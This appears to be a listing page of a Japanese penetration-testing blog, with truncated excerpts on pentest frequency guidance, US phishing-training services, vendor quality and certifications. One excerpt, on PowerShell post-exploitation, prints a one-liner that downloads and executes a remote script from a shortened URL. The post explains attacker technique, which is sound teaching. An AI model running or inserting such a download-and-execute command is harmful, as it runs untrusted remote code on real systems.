2018/01/09 金融庁関連の話題を追加しました。 少し前ですが、２０１７年８月にJPCERT/CCが「Web サイトへのサイバー攻撃に備えて」という報告を発表して、セキュリティ診断・ペネトレーションテストの頻度について言及をしています。今回は、各レギュレーシ…

PowerShellは、Post-Exploitationプロセスで非常に良く使われます。例えば、以下のコマンドを実行するとリモートにあるファイルを取得してその内容を実行してくれます。 Invoke-Expression (New-Object Net.WebClient).DownloadString("http://bit.ly/L3g1t"…

先日、標的型メール訓練サービスについて少し米国事情を調べたり、講演で聞いた内容をまとめる機会があり、その内容を共有します。 日本では、標的型攻撃診断では「標的型攻撃メール訓練サービス」などと呼ばれるユーザの開封率などを視覚化してくれるサービ…

先日つたない記事を書いたところ、（このブログとしては）すごい反響をいただきました（かなりこっそりやっていて誰も見ているとは思わなかったので）。ペネトレーション・テストにみんな関心があるんだなと思い、もうひとつ記事を書こうと思います。 www.sc…

2016/08/13 書き忘れた項目があったため、追記しました。 今日は米国流ペネトレーション・テストについての実情についてまとめてみたいと思います。 日本におけるペネトレーション・テストとは？ ざっくりとまとめると、日本におけるペネトレーション・テス…

日本企業がセキュリティ診断をする場合、ベンダーに依頼することが一般的だと思います。 ベンダー選定時には、コスト・品質・評判など色々な判断基準はあるかと思いますが、特に品質は難しい問題です。「高品質なのか？」、「値段に見合う品質なのか？」とい…

ペネトレーション・テスターの技術力を見る上で、「資格」が一つの基準として利用されています。 日本では、SANSのGPEN*1やGWAPT*2が一番有名かと思いますが、この記事では米国の資格事情をご紹介しようと思います。（評価には個人の意見がかなり含まれてい…